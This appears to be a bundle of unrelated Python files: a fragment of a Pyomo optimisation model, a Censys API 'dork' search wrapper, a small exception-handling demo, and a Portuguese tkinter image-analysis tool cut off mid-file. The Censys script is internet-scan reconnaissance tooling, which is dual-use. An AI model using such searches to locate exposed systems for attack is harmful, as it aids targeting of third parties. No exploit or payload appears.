m.c72 = Constraint(expr= - m.x16 + m.x58 - 10*m.b133 >= -8.61370563888011)
m.c73 = Constraint(expr= - m.x18 + m.x58 - 10*m.b134 >= -8.61370563888011)
m.c74 = Constraint(expr= - m.x19 + m.x58 - 10*m.b135 >= -8.61370563888011)
m.c75 = Constraint(expr= - m.x20 + m.x58 - 10*m.b136 >= -8.61370563888011)
m.c76 = Constraint(expr= - m.x21 + m.x58 - 10*m.b137 >= -8.61370563888011)
m.c77 = Constraint(expr= - m.x22 + m.x58 - 10*m.b138 >= -8.61370563888011)
m.c78 = Constraint(expr= - m.x23 + m.x58 - 10*m.b139 >= -8.61370563888011)
m.c79 = Constraint(expr= - m.x24 + m.x58 - 10*m.b140 >= -8.61370563888011)
m.c80 = Constraint(expr= - m.x26 + m.x58 - 10*m.b141 >= -8.61370563888011)
m.c81 = Constraint(expr= - m.x27 + m.x58 - 10*m.b142 >= -8.61370563888011)
m.c82 = Constraint(expr= - m.x28 + m.x58 - 10*m.b143 >= -8.61370563888011)
m.c83 = Constraint(expr= - m.x29 + m.x58 - 10*m.b144 >= -8.61370563888011)
m.c84 = Constraint(expr= - m.x30 + m.x58 - 10*m.b145 >= -8.61370563888011)
m.c85 = Constraint(expr= - m.x31 + m.x58 - 10*m.b146 >= -8.61370563888011)
m.c86 = Constraint(expr= - m.x32 + m.x58 - 10*m.b147 >= -8.61370563888011)
m.c87 = Constraint(expr= - m.x34 + m.x58 - 10*m.b148 >= -8.61370563888011)
m.c88 = Constraint(expr= - m.x35 + m.x58 - 10*m.b149 >= -8.61370563888011)
m.c89 = Constraint(expr= - m.x36 + m.x58 - 10*m.b150 >= -8.61370563888011)
m.c90 = Constraint(expr= - m.x37 + m.x58 - 10*m.b151 >= -8.61370563888011)
m.c91 = Constraint(expr= - m.x38 + m.x58 - 10*m.b152 >= -8.61370563888011)
m.c92 = Constraint(expr= - m.x39 + m.x58 - 10*m.b153 >= -8.61370563888011)
m.c93 = Constraint(expr= - m.x40 + m.x58 - 10*m.b154 >= -8.61370563888011)
m.c94 = Constraint(expr= - m.x9 + m.x58 - 10*m.b127 >= -8.61370563888011)
m.c95 = Constraint(expr= - m.x10 + m.x58 - 10*m.b128 >= -8.61370563888011)
m.c96 = Constraint(expr= - m.x11 + m.x58 - 10*m.b129 >= -8.61370563888011)
m.c97 = Constraint(expr= - m.x12 + m.x58 - 10*m.b130 >= -8.61370563888011)
m.c98 = Constraint(expr= - m.x13 + m.x58 - 10*m.b131 >= -8.61370563888011)
m.c99 = Constraint(expr= - m.x14 + m.x58 - 10*m.b132 >= -8.61370563888011)
m.c100 = Constraint(expr= - m.x15 + m.x58 - 10*m.b133 >= -8.61370563888011)
m.c101 = Constraint(expr= - m.x17 + m.x58 - 10*m.b134 >= -8.61370563888011)
m.c102 = Constraint(expr= - m.x18 + m.x58 - 10*m.b135 >= -8.61370563888011)
m.c103 = Constraint(expr= - m.x19 + m.x58 - 10*m.b136 >= -8.61370563888011)
m.c104 = Constraint(expr= - m.x20 + m.x58 - 10*m.b137 >= -8.61370563888011)
m.c105 = Constraint(expr= - m.x21 + m.x58 - 10*m.b138 >= -8.61370563888011)
m.c106 = Constraint(expr= - m.x22 + m.x58 - 10*m.b139 >= -8.61370563888011)
m.c107 = Constraint(expr= - m.x23 + m.x58 - 10*m.b140 >= -8.61370563888011)
m.c108 = Constraint(expr= - m.x25 + m.x58 - 10*m.b141 >= -8.61370563888011)
m.c109 = Constraint(expr= - m.x26 + m.x58 - 10*m.b142 >= -8.61370563888011)
m.c110 = Constraint(expr= - m.x27 + m.x58 - 10*m.b143 >= -8.61370563888011)
m.c111 = Constraint(expr= - m.x28 + m.x58 - 10*m.b144 >= -8.61370563888011)
m.c112 = Constraint(expr= - m.x29 + m.x58 - 10*m.b145 >= -8.61370563888011)
m.c113 = Constraint(expr= - m.x30 + m.x58 - 10*m.b146 >= -8.61370563888011)
m.c114 = Constraint(expr= - m.x31 + m.x58 - 10*m.b147 >= -8.61370563888011)
m.c115 = Constraint(expr= - m.x33 + m.x58 - 10*m.b148 >= -8.61370563888011)
m.c116 = Constraint(expr= - m.x34 + m.x58 - 10*m.b149 >= -8.61370563888011)
m.c117 = Constraint(expr= - m.x35 + m.x58 - 10*m.b150 >= -8.61370563888011)
m.c118 = Constraint(expr= - m.x36 + m.x58 - 10*m.b151 >= -8.61370563888011)
m.c119 = Constraint(expr= - m.x37 + m.x58 - 10*m.b152 >= -8.61370563888011)
m.c120 = Constraint(expr= - m.x38 + m.x58 - 10*m.b153 >= -8.61370563888011)
m.c121 = Constraint(expr= - m.x39 + m.x58 - 10*m.b154 >= -8.61370563888011)
m.c122 = Constraint(expr= m.x41 - 0.693147180559945*m.b71 - 1.09861228866811*m.b79 - 1.38629436111989*m.b87 == 0)
m.c123 = Constraint(expr= m.x42 - 0.693147180559945*m.b72 - 1.09861228866811*m.b80 - 1.38629436111989*m.b88 == 0)
m.c124 = Constraint(expr= m.x43 - 0.693147180559945*m.b73 - 1.09861228866811*m.b81 - 1.38629436111989*m.b89 == 0)
m.c125 = Constraint(expr= m.x44 - 0.693147180559945*m.b74 - 1.09861228866811*m.b82 - 1.38629436111989*m.b90 == 0)
m.c126 = Constraint(expr= m.x45 - 0.693147180559945*m.b75 - 1.09861228866811*m.b83 - 1.38629436111989*m.b91 == 0)
m.c127 = Constraint(expr= m.x46 - 0.693147180559945*m.b76 - 1.09861228866811*m.b84 - 1.38629436111989*m.b92 == 0)
m.c128 = Constraint(expr= m.x47 - 0.693147180559945*m.b77 - 1.09861228866811*m.b85 - 1.38629436111989*m.b93 == 0)
m.c129 = Constraint(expr= m.x48 - 0.693147180559945*m.b78 - 1.09861228866811*m.b86 - 1.38629436111989*m.b94 == 0)
m.c130 = Constraint(expr= m.x49 - 0.693147180559945*m.b103 - 1.09861228866811*m.b111 - 1.38629436111989*m.b119 == 0)
m.c131 = Constraint(expr= m.x50 - 0.693147180559945*m.b104 - 1.09861228866811*m.b112 - 1.38629436111989*m.b120 == 0)
m.c132 = Constraint(expr= m.x51 - 0.693147180559945*m.b105 - 1.09861228866811*m.b113 - 1.38629436111989*m.b121 == 0)
m.c133 = Constraint(expr= m.x52 - 0.693147180559945*m.b106 - 1.09861228866811*m.b114 - 1.38629436111989*m.b122 == 0)
m.c134 = Constraint(expr= m.x53 - 0.693147180559945*m.b107 - 1.09861228866811*m.b115 - 1.38629436111989*m.b123 == 0)
m.c135 = Constraint(expr= m.x54 - 0.693147180559945*m.b108 - 1.09861228866811*m.b116 - 1.38629436111989*m.b124 == 0)
m.c136 = Constraint(expr= m.x55 - 0.693147180559945*m.b109 - 1.09861228866811*m.b117 - 1.38629436111989*m.b125 == 0)
m.c137 = Constraint(expr= m.x56 - 0.693147180559945*m.b110 - 1.09861228866811*m.b118 - 1.38629436111989*m.b126 == 0)
m.c138 = Constraint(expr= m.b63 + m.b71 + m.b79 + m.b87 == 1)
m.c139 = Constraint(expr= m.b64 + m.b72 + m.b80 + m.b88 == 1)
m.c140 = Constraint(expr= m.b65 + m.b73 + m.b81 + m.b89 == 1)
m.c141 = Constraint(expr= m.b66 + m.b74 + m.b82 + m.b90 == 1)
m.c142 = Constraint(expr= m.b67 + m.b75 + m.b83 + m.b91 == 1)
m.c143 = Constraint(expr= m.b68 + m.b76 + m.b84 + m.b92 == 1)
m.c144 = Constraint(expr= m.b69 + m.b77 + m.b85 + m.b93 == 1)
m.c145 = Constraint(expr= m.b70 + m.b78 + m.b86 + m.b94 == 1)
m.c146 = Constraint(expr= m.b95 + m.b103 + m.b111 + m.b119 == 1)
m.c147 = Constraint(expr= m.b96 + m.b104 + m.b112 + m.b120 == 1)
m.c148 = Constraint(expr= m.b97 + m.b105 + m.b113 + m.b121 == 1)
m.c149 = Constraint(expr= m.b98 + m.b106 + m.b114 + m.b122 == 1)
m.c150 = Constraint(expr= m.b99 + m.b107 + m.b115 + m.b123 == 1)
m.c151 = Constraint(expr= m.b100 + m.b108 + m.b116 + m.b124 == 1)
m.c152 = Constraint(expr= m.b101 + m.b109 + m.b117 + m.b125 == 1)
m.c153 = Constraint(expr= m.b102 + m.b110 + m.b118 + m.b126 == 1)
m.c154 = Constraint(expr= m.b127 + m.b128 + m.b129 + m.b130 + m.b131 + m.b132 + m.b133 <= 1)
m.c155 = Constraint(expr= m.b134 + m.b135 + m.b136 + m.b137 + m.b138 + m.b139 + m.b140 <= 1)
m.c156 = Constraint(expr= m.b141 + m.b142 + m.b143 + m.b144 + m.b145 + m.b146 + m.b147 <= 1)
m.c157 = Constraint(expr= m.b148 + m.b149 + m.b150 + m.b151 + m.b152 + m.b153 + m.b154 <= 1)
m.c158 = Constraint(expr= m.b127 + m.b128 + m.b129 + m.b130 + m.b131 + m.b132 + m.b133 + m.b134 + m.b135 + m.b136
+ m.b137 + m.b138 + m.b139 + m.b140 + m.b141 + m.b142 + m.b143 + m.b144 + m.b145 + m.b146
+ m.b147 + m.b148 + m.b149 + m.b150 + m.b151 + m.b152 + m.b153 + m.b154 >= 1)
m.c159 = Constraint(expr= m.x9 - m.x10 - 0.693147180559945*m.b127 <= 0)
m.c160 = Constraint(expr= m.x10 - m.x11 - 0.693147180559945*m.b128 <= 0)
m.c161 = Constraint(expr= m.x11 - m.x12 - 0.693147180559945*m.b129 <= 0)
m.c162 = Constraint(expr= m.x12 - m.x13 - 0.693147180559945*m.b130 <= 0)
m.c163 = Constraint(expr= m.x13 - m.x14 - 0.693147180559945*m.b131 <= 0)
m.c164 = Constraint(expr= m.x14 - m.x15 - 0.693147180559945*m.b132 <= 0)
m.c165 = Constraint(expr= m.x15 - m.x16 - 0.693147180559945*m.b133 <= 0)
m.c166 = Constraint(expr= m.x17 - m.x18 - 0.693147180559945*m.b134 <= 0)
m.c167 = Constraint(expr= m.x18 - m.x19 - 0.693147180559945*m.b135 <= 0)
m.c168 = Constraint(expr= m.x19 - m.x20 - 0.693147180559945*m.b136 <= 0)
m.c169 = Constraint(expr= m.x20 - m.x21 - 0.693147180559945*m.b137 <= 0)
m.c170 = Constraint(expr= m.x21 - m.x22 - 0.693147180559945*m.b138 <= 0)
m.c171 = Constraint(expr= m.x22 - m.x23 - 0.693147180559945*m.b139 <= 0)
m.c172 = Constraint(expr= m.x23 - m.x24 - 0.693147180559945*m.b140 <= 0)
m.c173 = Constraint(expr= m.x25 - m.x26 - 0.693147180559945*m.b141 <= 0)
m.c174 = Constraint(expr= m.x26 - m.x27 - 0.693147180559945*m.b142 <= 0)
m.c175 = Constraint(expr= m.x27 - m.x28 - 0.693147180559945*m.b143 <= 0)
m.c176 = Constraint(expr= m.x28 - m.x29 - 0.693147180559945*m.b144 <= 0)
m.c177 = Constraint(expr= m.x29 - m.x30 - 0.693147180559945*m.b145 <= 0)
m.c178 = Constraint(expr= m.x30 - m.x31 - 0.693147180559945*m.b146 <= 0)
m.c179 = Constraint(expr= m.x31 - m.x32 - 0.693147180559945*m.b147 <= 0)
m.c180 = Constraint(expr= m.x33 - m.x34 - 0.693147180559945*m.b148 <= 0)
m.c181 = Constraint(expr= m.x34 - m.x35 - 0.693147180559945*m.b149 <= 0)
m.c182 = Constraint(expr= m.x35 - m.x36 - 0.693147180559945*m.b150 <= 0)
m.c183 = Constraint(expr= m.x36 - m.x37 - 0.693147180559945*m.b151 <= 0)
m.c184 = Constraint(expr= m.x37 - m.x38 - 0.693147180559945*m.b152 <= 0)
m.c185 = Constraint(expr= m.x38 - m.x39 - 0.693147180559945*m.b153 <= 0)
m.c186 = Constraint(expr= m.x39 - m.x40 - 0.693147180559945*m.b154 <= 0)
m.c187 = Constraint(expr= m.x9 - m.x10 + 0.693147180559945*m.b127 >= 0)
m.c188 = Constraint(expr= m.x10 - m.x11 + 0.693147180559945*m.b128 >= 0)
m.c189 = Constraint(expr= m.x11 - m.x12 + 0.693147180559945*m.b129 >= 0)
m.c190 = Constraint(expr= m.x12 - m.x13 + 0.693147180559945*m.b130 >= 0)
m.c191 = Constraint(expr= m.x13 - m.x14 + 0.693147180559945*m.b131 >= 0)
m.c192 = Constraint(expr= m.x14 - m.x15 + 0.693147180559945*m.b132 >= 0)
m.c193 = Constraint(expr= m.x15 - m.x16 + 0.693147180559945*m.b133 >= 0)
m.c194 = Constraint(expr= m.x17 - m.x18 + 0.693147180559945*m.b134 >= 0)
m.c195 = Constraint(expr= m.x18 - m.x19 + 0.693147180559945*m.b135 >= 0)
m.c196 = Constraint(expr= m.x19 - m.x20 + 0.693147180559945*m.b136 >= 0)
m.c197 = Constraint(expr= m.x20 - m.x21 + 0.693147180559945*m.b137 >= 0)
m.c198 = Constraint(expr= m.x21 - m.x22 + 0.693147180559945*m.b138 >= 0)
m.c199 = Constraint(expr= m.x22 - m.x23 + 0.693147180559945*m.b139 >= 0)
m.c200 = Constraint(expr= m.x23 - m.x24 + 0.693147180559945*m.b140 >= 0)
m.c201 = Constraint(expr= m.x25 - m.x26 + 0.693147180559945*m.b141 >= 0)
m.c202 = Constraint(expr= m.x26 - m.x27 + 0.693147180559945*m.b142 >= 0)
m.c203 = Constraint(expr= m.x27 - m.x28 + 0.693147180559945*m.b143 >= 0)
m.c204 = Constraint(expr= m.x28 - m.x29 + 0.693147180559945*m.b144 >= 0)
m.c205 = Constraint(expr= m.x29 - m.x30 + 0.693147180559945*m.b145 >= 0)
m.c206 = Constraint(expr= m.x30 - m.x31 + 0.693147180559945*m.b146 >= 0)
m.c207 = Constraint(expr= m.x31 - m.x32 + 0.693147180559945*m.b147 >= 0)
m.c208 = Constraint(expr= m.x33 - m.x34 + 0.693147180559945*m.b148 >= 0)
m.c209 = Constraint(expr= m.x34 - m.x35 + 0.693147180559945*m.b149 >= 0)
m.c210 = Constraint(expr= m.x35 - m.x36 + 0.693147180559945*m.b150 >= 0)
m.c211 = Constraint(expr= m.x36 - m.x37 + 0.693147180559945*m.b151 >= 0)
m.c212 = Constraint(expr= m.x37 - m.x38 + 0.693147180559945*m.b152 >= 0)
m.c213 = Constraint(expr= m.x38 - m.x39 + 0.693147180559945*m.b153 >= 0)
m.c214 = Constraint(expr= m.x39 - m.x40 + 0.693147180559945*m.b154 >= 0)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from searchengine import searchengine
import requests
class censys(searchengine):
def __init__(self):
super(censys, self).__init__()
def censys_dork_search(self, uid, secret, dork, dorktype, page=1):
"""query information form censys with api.
uid: censys API ID.
secret: censys API secret.
dork: censys dork syntax.
dorktype: [certificates, ipv4, websites].
page: The page of the result set to be returned.
The number of pages in the result set is available under
metadata in any request. By default, the API will return
the first page of results. One indexed.
api doc: https://censys.io/api/v1/docs/search
"""
censys_api = 'https://www.censys.io/api/v1/search/{}'.format(dorktype)
query = {'query': dork, 'page': page}
return requests.post(censys_api, auth=(uid, secret), json=query)
def parse_results(self, response):
"""parse censys results
"""
assert response and response.json()
assert response.json()['status'] == 'ok'
# {u'status': u'error',
# u'error_type': u'malformed_request',
# u'error': u'request is missing the required field query'}
json_response = response.json()
status = json_response['status']
results = json_response['results']
# demo return value: {u'count': 12948,
# u'query': u'apache',
# u'backend_time': 510,
# u'page': 1,
# u'pages': 130}
metadata = json_response['metadata']
return (status, results, metadata)
if __name__ == '__main__':
uid = raw_input('censys API ID: ')
secret = raw_input('censys secret: ')
dork = raw_input('censys dork: ')
dorktype = raw_input('censys dork type, [certificates, ipv4, websites]: ')
cs = censys()
response = cs.censys_dork_search(uid, secret, dork, dorktype)
status, results, metadata = cs.parse_results(response)
for _ in results:
print(_)
# Certificates Search:
# {u'parsed.fingerprint_sha256': [
# u'632aa7af6fed88218fbef0983823032093ef662b96c14574bb43da5bdb046f7e'
# ],
# u'parsed.subject_dn': [
# u'OU=Domain Control Validated, '
# 'OU=PositiveSSL Multi-Domain, '
# 'CN=sni191653.cloudflaressl.com'
# ],
# u'parsed.issuer_dn': [
# u'C=GB, ST=Greater Manchester, '
# 'L=Salford, '
# 'O=COMODO CA Limited, '
# 'CN=COMODO ECC Domain Validation Secure Server CA 2'
# ]}
# IPv4 Search
# {u'ip': u'xxx.xxx.xxx.xxx', u'protocols': [u'443/https']}
# Websites Search:
# {u'domain': u'demo.com', u'alexa_rank': [622]}
|
#!/usr/bin/env python3
def show():
try:
raise Exception("foo")
except Exception as e:
print("caught")
finally:
print("Finally")
try:
3 / 0
except ZeroDivisionError:
print("OK")
try:
raise Exception("foo")
except:
print("Got it")
if __name__ == "__main__":
show()
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 07 17:56:46 2016
@author: Arenhart
"""
import PIL.Image as pil
import PIL.ImageTk as imagetk
import numpy as np
import scipy.ndimage as sp
import matplotlib.pyplot as plt
import skimage as sk
import skimage.filters as filters
import skimage.morphology as morphology
import skimage.measure as measure
import skimage.feature as feature
import tkinter as tk
import tkinter.filedialog as filedialog
import os
MAX_WIDTH = 300
MAX_HEIGHT = 300
def plt_to_image():
i = 0
filename = 'temp'+str(i)+'.tif'
while filename in os.listdir(os.getcwd()):
i += 1
filename = 'temp'+str(i)+'.tif'
if i >= 1000: return None
plt.savefig(filename)
with open(filename, 'rb') as file:
image = pil.open(file)
img = image.copy()
image.close()
os.remove(filename)
return img
def carregar():
return pil.open(filedialog.askopenfilename())
def salvar(imagem):
save_name = filedialog.asksaveasfilename()
if save_name == '': return
try:
imagem.save(save_name)
except:
if '.' in save_name:
save_name = save_name[:save_name.find('.')] + '.bmp'
else:
save_name = save_name + '.bmp'
imagem.save(save_name)
def verificar_binaria(matriz):
mat = matriz > 0
return np.sum(mat) * 255 == np.sum(matriz)
def vis(matriz):
return pil.fromarray(matriz)
def binarizar(matriz, limiar=None):
if limiar == None:
limiar = filters.threshold_otsu(matriz)
return ((matriz >= limiar) *255).astype('uint8')
def histograma(matriz, bins = 254):
plt.clf()
return plt.hist(matriz.flatten(),bins=bins)
def mapa_distancia(matriz_binarizada):
return sp.morphology.distance_transform_edt(matriz_binarizada)
def inverter(matriz):
return 255 - matriz
def expandir_contraste(matriz):
return sk.exposure.rescale_intensity(matriz)
def equalizar_histograma(matriz):
return (sk.exposure.equalize_hist(matriz)*255).astype('uint8')
def filtro_gaussiano(matriz,sigma):
return (filters.gaussian(matriz,
sigma=sigma)*255).astype('uint8')
def filtro_mediana(matriz,tamanho):
return filters.median(matriz,morphology.disk(tamanho))
def filtro_realce(matriz, tamanho=1):
return filters.rank.enhance_contrast(matriz,morphology.disk(tamanho))
def filtro_prewitt(matriz):
return (255-filters.prewitt(matriz)*255).astype('uint8')
def filtro_sobel(matriz):
return (255-filters.sobel(matriz)*255).astype('uint8')
def filtro_scharr(matriz):
return (255-filters.scharr(matriz)*255).astype('uint8')
def erosao(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_erosion(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def dilatacao(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_dilation(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def abertura(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_opening(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def fechamento(matriz_binaria,tamanho=1):
matriz_binaria = matriz_binaria//255
return (morphology.binary_closing(
matriz_binaria,morphology.disk(tamanho))*255).astype('uint8')
def granulometria(matriz_binaria):
matriz_binaria = matriz_binaria
area_inicial = matriz_binaria.sum()
menor_aresta = min(matriz_binaria.shape)
raio = [0]
area_cf = [0]
area = [0]
i = 1
while area_cf[-1] < 1 and i < menor_aresta and i < 50:
raio.append(i)
new_area = 1 - (abertura(matriz_binaria,i).sum()/area_inicial)
area.append(new_area-area_cf[-1])
area_cf.append(new_area)
i += 1
print(i)
plt.plot(raio,area,color='blue')
plt.plot(raio,area_cf,color='green')
def correlacao(matriz_binaria):
if not matriz_binaria.dtype == 'bool':
matriz_binaria = (matriz_binaria / matriz_binaria.max()).astype('uint8')
comprimento = min(matriz_binaria.shape)//2
correlacao_x = []
correlacao_y = []
correlacao_x.append(matriz_binaria.mean())
for i in range(1,comprimento):
correlacao_x.append(
( (matriz_binaria[0:-i,:] * matriz_binaria[i:,:]).sum() )
/ matriz_binaria[i:,:].size )
correlacao_y.append(matriz_binaria.mean())
for i in range(1,comprimento):
correlacao_y.append(
( (matriz_binaria[:,0:-i] * matriz_binaria[:,i:]).sum() )
/ matriz_binaria[:,i:].size )
correlacao_x = np.array(correlacao_x)
correlacao_y = np.array(correlacao_y)
correlacao = (correlacao_x + correlacao_y)/2
plt.plot(range(comprimento),correlacao_x,color='blue')
plt.plot(range(comprimento),correlacao_y,color='red')
plt.plot(range(comprimento),correlacao,color='green')
#plt.show()
return (correlacao_x, correlacao_y, correlacao)
def rotular(imagem_binaria):
return measure.label(imagem_binaria,background=0)
def rotular_colorido(matriz_binaria):
mat_rotulada = measure.label(matriz_binaria,background=0)
size = matriz_binaria.shape
mat = np.zeros((size[0],size[1],3),dtype = np.uint8)
max_index = mat_rotulada.max()
g_factor = int(max_index**(2/3))
r_factor = int(max_index**(1/3))
for i,j in [(i,j) for i in range(size[0]) for j in range(size[1])]:
index = mat_rotulada[i,j]
if index == 0:
mat[i,j,0], mat[i,j,1], mat[i,j,2] = 0, 0, 0
continue
b = 50 + int( 205 * (index / max_index) )
g = 50 + int( (index%g_factor) * (205/g_factor))
r = 50 + int( (index%r_factor) * (205/r_factor))
mat[i,j,0], mat[i,j,1], mat[i,j,2] = r,g,b
return mat
def conectividade(matriz_binaria):
matriz_binaria = rotular(matriz_binaria)
comprimento = range(min(matriz_binaria.shape)//2)
tamanho_total = matriz_binaria.shape[0]*matriz_binaria.shape[1]
conectividade_x = []
conectividade_y = []
matriz = matriz_binaria#.flatten()
for i in comprimento:
matriz_deslocada = np.append(matriz[i:,:],matriz[:i,:])
matriz_sobreposta = np.logical_and(matriz_deslocada==matriz,matriz != -1)
conectividade_x.append(sum(matriz_sobreposta)/tamanho_total)
#matriz = matriz_binaria.transpose().flatten()
for i in comprimento:
matriz_deslocada = np.append(matriz[:,i:],matriz[:,:i])
matriz_sobreposta = np.logical_and(matriz_deslocada==matriz,matriz != -1)
conectividade_y.append(sum(matriz_sobreposta)/tamanho_total)
conectividade = (np.array(conectividade_x) + np.array(conectividade_y))/2
plt.plot(comprimento,conectividade_x,color='blue')
plt.plot(comprimento,conectividade_y,color='red')
plt.plot(comprimento,conectividade,color='green')
#plt.show()
def propriedades(matriz_rotulada,bins=20):
prop = measure.regionprops(matriz_rotulada)
perimetros = []
areas = []
alongamento = []
rugosidade = []
for p in prop:
if p['minor_axis_length'] == 0 : continue
perimetros.append(p['perimeter'])
areas.append(p['area'])
rugosidade.append(p['perimeter']**2/(4*np.pi*p['area']))
alongamento.append(p['major_axis_length']/p['minor_axis_length'])
print ('Contagem: ' + str(len(perimetros)))
print ('Perimetros (media = ' + str(np.mean(perimetros)) + ' ; desvio padrao = ' + str(np.std(perimetros)) + ')')
plt.hist(perimetros,bins=bins)
plt.show()
print ('Areas (media = ' + str(np.mean(areas)) + ' ; desvio padrao = ' + str(np.std(areas)) + ')')
plt.hist(areas,bins=bins)
plt.show()
print ('Alongamento (media = ' + str(np.mean(alongamento)) + ' ; desvio padrao = ' + str(np.std(alongamento)) + ')')
plt.hist(alongamento,bins=bins)
plt.show()
print ('Rugosidade (media = ' + str(np.mean(rugosidade)) + ' ; desvio padrao = ' + str(np.std(rugosidade)) + ')')
plt.hist(rugosidade,bins=bins)
plt.show()
def gerar_ruido_gaussiano(matriz,desv_pad=0.01):
return (sk.util.random_noise(matriz,var=desv_pad)*255).astype('uint8')
def gerar_ruido_snp(matriz,quantidade=0.1):
return (sk.util.random_noise(matriz,mode='s&p',amount=quantidade)*255).astype('uint8')
def gerar_imagem_ruido(aresta,densidade):
return (sk.util.random_noise(np.zeros((aresta[0],aresta[1])),
mode='salt',amount=densidade)*255).astype('uint8')
def extrair_bordas(matriz, mediana = 1, gaussiano = 2, realce = 2,
limiar = None, mediana2 = 0,
janela = 100, offset = 0):
bordas = filtro_mediana(matriz,mediana)
bordas = filtro_gaussiano(bordas, gaussiano)
bordas = filtro_realce(bordas,realce)
bordas = filtro_scharr(bordas)
bordas = (filters.threshold_adaptive(bordas,janela,
offset=offset)*255).astype('uint8')
fundo = binarizar(matriz, limiar)
bordas = bordas * (fundo//255)
bordas = filtro_mediana(bordas,mediana2)
return bordas
def segregacao_watershed(bordas, pegada = 5, limiar = 0):
dist = mapa_distancia(bordas)
picos = feature.peak_local_max(dist,indices = False,
labels = bordas,
footprint = np.ones((pegada,pegada)),
threshold_rel = limiar)
marcadores = sp.label(picos)
rotulos = morphology.watershed(-dist, marcadores[0], mask = bordas)
return rotulos
'''
Interface
'''
class Interface():
def __init__(self, parent):
self.parent = parent
self.img = None
self.img_desfazer = None
self.main_frame = tk.Frame(self.parent)
self.main_frame.pack()
self.image_frame = tk.Frame(self.parent)
self.image_frame.pack(fill=tk.BOTH, expand = 1)
self.canvas = tk.Canvas(self.image_frame,
relief = tk.SUNKEN)
self.canvas.config(width=200,height=200)
self.canvas.pack(side=tk.TOP, fill=tk.BOTH, expand = 1)
self.sbV = tk.Scrollbar(self.canvas, orient=tk.VERTICAL)
self.sbH = tk.Scrollbar(self.canvas, orient=tk.HORIZONTAL)
self.sbV.config(command=self.canvas.yview)
self.sbH.config(command=self.canvas.xview)
self.canvas.config(yscrollcommand=self.sbV.set)
self.canvas.config(xscrollcommand=self.sbH.set)
self.sbV.pack(side=tk.RIGHT, fill=tk.Y)
self.sbH.pack(side=tk.BOTTOM, fill=tk.X)
'''
Inicializacao dos botoes de menu
'''
self.menu = tk.Menu(parent)
self.menu_arquivo = tk.Menu(self.menu,tearoff=0)
self.menu_arquivo.add_command(label="Abrir imagem",
command = self.carregar_imagem)
self.menu_arquivo.add_command(label="Salvar imagem",
command = self.salvar_imagem)
self.menu_arquivo.add_command(label="Fechar imagem",
command = self.fechar_imagem)
self.menu_arquivo.add_command(label="Defazer",
command = self.desfazer)
self.menu_arquivo.add_command(label="Sair",
command = self.fechar)
self.menu.add_cascade(label = 'Arquivo',
menu=self.menu_arquivo)
self.menu_transformar = tk.Menu(self.menu,tearoff=0)
self.menu_transformar.add_command(label='Converter escala de cinza',
command = self.escala_de_cinza)
self.menu_transformar.add_command(label = 'Binarizar...',
command = self.binarizar)
self.menu_transformar.add_command(label = 'Mapa de distancia',
command = self.mapa_distancia)
self.menu_transformar.add_command(label = 'Inverter',
command = self.inverter)
self.menu_transformar.add_command(label = 'Rotular',
command = self.rotular)
self.menu.add_cascade(label="Transformar",
menu = self.menu_transformar)
self.menu_filtros = tk.Menu(self.menu, tearoff = 0)
self.menu_filtros.add_command(label = 'Expandir Contraste',
command = self.expandir_contraste)
self.menu_filtros.add_command(label = 'Equalizar Histograma',
command = self.equalizar_histograma)
self.menu_filtros.add_command(label = 'Filtro Gaussiano...',
command = lambda: self.filtro('init gauss'))
self.menu_filtros.add_command(label = 'Filtro da Mediana...',
command = lambda: self.filtro('init media'))
self.menu_filtros.add_command(label = 'Filtro Realce...',
command = lambda: self.filtro('init real'))
self.menu_filtros.add_command(label = 'Filtro Prewitt',
command = self.filtro_prewitt)
self.menu_filtros.add_command(label = 'Filtro Sobel',
command = self.filtro_sobel)
self.menu_filtros.add_command(label = 'Filtro Scharr',
command = self.filtro_scharr)
self.menu.add_cascade(label="Filtros", menu = self.menu_filtros)
self.menu_info = tk.Menu(self.menu, tearoff = 0)
self.menu_info.add_command(label = 'Histograma...',
command = self.histograma)
self.menu_info.add_command(label = 'Correlacao',
command = self.correlacao)
self.menu_info.add_command(label = 'Conectividade',
command = self.conectividade)
self.menu_info.add_command(label = 'Propriedades',
command = self.propriedades)
self.menu.add_cascade(label="Info", menu = self.menu_info)
self.menu_morfologia = tk.Menu(self.menu, tearoff = 0)
self.menu_morfologia.add_command(label = 'Erosao...',
command = lambda: self.morfologia('init erosao'))
self.menu_morfologia.add_command(label = 'Dilatacao...',
command = lambda: self.morfologia('init dilatacao'))
self.menu_morfologia.add_command(label='Abertura...',
command = lambda: self.morfologia('init abertura'))
self.menu_morfologia.add_command(label = 'Fechamento...',
command = lambda: self.morfologia('init fechamento'))
self.menu_morfologia.add_command(label = 'Granulometria',
command = self.granulometria)
self.menu.add_cascade(label="Morfologia", menu=self.menu_morfologia)
self.menu_ruido = tk.Menu(self.menu, tearoff = 0)
self.menu_ruido.add_command(label = 'Gerar Ruido Gaussiano...',
command = lambda: self.filtro('init gaussiano'))
self.menu_ruido.add_command(label = 'Gerar Ruido "Sal e Pimenta"...',
command = lambda: self.filtro('init snp'))
self.menu_ruido.add_command(label = 'Criar Imagem com Ruido...',
command = lambda: self.gerar_imagem_ruido('init'))
self.menu.add_cascade(label="Ruido", menu=self.menu_ruido)
self.menu_bordas = tk.Menu(self.menu, tearoff=0)
self.menu_bordas.add_command(label = 'Extrair Bordas...',
command = self.extrair_bordas)
self.menu_bordas.add_command(label = 'Segregacao Watershed...',
command = self.segregacao_watershed)
self.menu.add_cascade(label="Bordas", menu=self.menu_bordas)
'''
fim da inicializacao dos botoes de menu
'''
'''
Inicializacao janelas secundarias
'''
# Histograma
self.janela_histograma = tk.Toplevel(self.parent)
self.janela_histograma.withdraw()
self.histograma_show = tk.Label(self.janela_histograma)
self.histograma_show.pack(side=tk.TOP)
self.histograma_button = tk.Button(self.janela_histograma,
text='Fechar',
command = self.janela_histograma.withdraw)
self.histograma_button.pack(side=tk.TOP)
# Binarizacao
self.janela_binarizar = tk.Toplevel(self.parent)
self.janela_binarizar.protocol('WM_DELETE_WINDOW', lambda: print('Invalido'))
self.janela_binarizar.withdraw()
self.binarizar_show = tk.Label(self.janela_binarizar)
